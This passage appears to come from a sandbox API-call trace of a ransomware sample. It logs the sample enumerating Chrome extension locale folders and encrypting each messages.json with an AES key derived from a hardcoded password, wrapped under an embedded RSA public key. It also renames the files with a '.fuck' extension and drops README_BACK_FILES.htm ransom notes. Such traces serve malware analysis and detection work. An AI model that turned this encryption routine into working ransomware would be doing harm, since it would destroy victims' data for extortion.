PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25138*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fe00) returned 1 [0257.774] CryptEncrypt (in: hKey=0x2e7fe00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.774] CryptEncrypt (in: hKey=0x2e7fe00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79ae8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79ae8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.774] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e79ae8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79ae8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.775] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb4, lpOverlapped=0x0) returned 1 [0257.776] CryptEncrypt (in: hKey=0x2938978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.776] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.776] CloseHandle (hObject=0x5d60) returned 1 [0257.777] CloseHandle (hObject=0x5d5c) returned 1 [0257.777] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json"), bFailIfExists=0) returned 1 [0257.780] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json", dwFileAttributes=0x0) returned 1 [0257.780] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.gsg")) returned 1 [0257.781] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\messages.json.fuck")) returned 1 [0257.782] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.782] CryptDestroyKey (hKey=0x2938978) returned 1 [0257.782] CryptReleaseContext (hProv=0x2e79730, dwFlags=0x0) returned 1 [0257.782] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.782] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.782] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\readme_back_files.htm")) returned 0xffffffff [0257.782] AreFileApisANSI () returned 1 [0257.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4618, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.782] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.783] GetFileType (hFile=0x5d50) returned 0x1 [0257.783] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.784] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.784] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fcc0 [0257.785] FindNextFileA (in: hFindFile=0x2e7fcc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.785] FindNextFileA (in: hFindFile=0x2e7fcc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.785] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.785] GetLastError () returned 0x0 [0257.785] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json")) returned 0x20 [0257.786] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x80) returned 1 [0257.786] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.787] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.788] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.788] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e79d90) returned 1 [0257.790] CryptCreateHash (in: hProv=0x2e79d90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.790] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.790] CryptHashData (hHash=0x2e7fac0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.790] CryptDeriveKey (in: hProv=0x2e79d90, Algid=0x6610, hBaseData=0x2e7fac0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fe80) returned 1 [0257.790] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.790] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.790] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e798c8) returned 1 [0257.791] CryptImportPublicKeyInfo (in: hCryptProv=0x2e798c8, dwCertEncodingType=0x1, pInfo=0x2e24b50*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24b80*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24b88*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fa00) returned 1 [0257.791] CryptEncrypt (in: hKey=0x2e7fa00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.791] CryptEncrypt (in: hKey=0x2e7fa00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e78eb0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e78eb0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.791] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e78eb0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e78eb0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.805] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xbb, lpOverlapped=0x0) returned 1 [0257.806] CryptEncrypt (in: hKey=0x2e7fe80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xbb, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.806] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.806] CloseHandle (hObject=0x5d5c) returned 1 [0257.806] CloseHandle (hObject=0x5d60) returned 1 [0257.807] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json"), bFailIfExists=0) returned 1 [0257.810] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json", dwFileAttributes=0x0) returned 1 [0257.810] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json.gsg")) returned 1 [0257.811] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\messages.json.fuck")) returned 1 [0257.813] CryptDestroyHash (hHash=0x2e7fac0) returned 1 [0257.813] CryptDestroyKey (hKey=0x2e7fe80) returned 1 [0257.813] CryptReleaseContext (hProv=0x2e79d90, dwFlags=0x0) returned 1 [0257.813] FindNextFileA (in: hFindFile=0x2e7fcc0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.813] FindClose (in: hFindFile=0x2e7fcc0 | out: hFindFile=0x2e7fcc0) returned 1 [0257.813] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\readme_back_files.htm")) returned 0xffffffff [0257.813] AreFileApisANSI () returned 1 [0257.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3310, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0257.813] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_BR\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_br\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.814] GetFileType (hFile=0x5d50) returned 0x1 [0257.814] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.816] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.816] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fe40 [0257.816] FindNextFileA (in: hFindFile=0x2e7fe40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.816] FindNextFileA (in: hFindFile=0x2e7fe40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.816] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.816] GetLastError () returned 0x0 [0257.816] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json")) returned 0x20 [0257.816] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x80) returned 1 [0257.817] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.818] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.818] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.819] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e78f38) returned 1 [0257.821] CryptCreateHash (in: hProv=0x2e78f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.821] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.821] CryptHashData (hHash=0x2e7fac0, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.821] CryptDeriveKey (in: hProv=0x2e78f38, Algid=0x6610, hBaseData=0x2e7fac0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7ff00) returned 1 [0257.821] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.821] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.821] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e78fc0) returned 1 [0257.821] CryptImportPublicKeyInfo (in: hCryptProv=0x2e78fc0, dwCertEncodingType=0x1, pInfo=0x2e251d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25200*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25208*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fcc0) returned 1 [0257.821] CryptEncrypt (in: hKey=0x2e7fcc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.821] CryptEncrypt (in: hKey=0x2e7fcc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79158*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79158*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.821] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e79158*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79158*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.822] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc6, lpOverlapped=0x0) returned 1 [0257.823] CryptEncrypt (in: hKey=0x2e7ff00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.824] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.824] CloseHandle (hObject=0x5d60) returned 1 [0257.824] CloseHandle (hObject=0x5d5c) returned 1 [0257.824] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json"), bFailIfExists=0) returned 1 [0257.827] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json", dwFileAttributes=0x0) returned 1 [0257.828] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_pt\\messages.json.gsg")) returned 1 [0257.829] MoveFileA 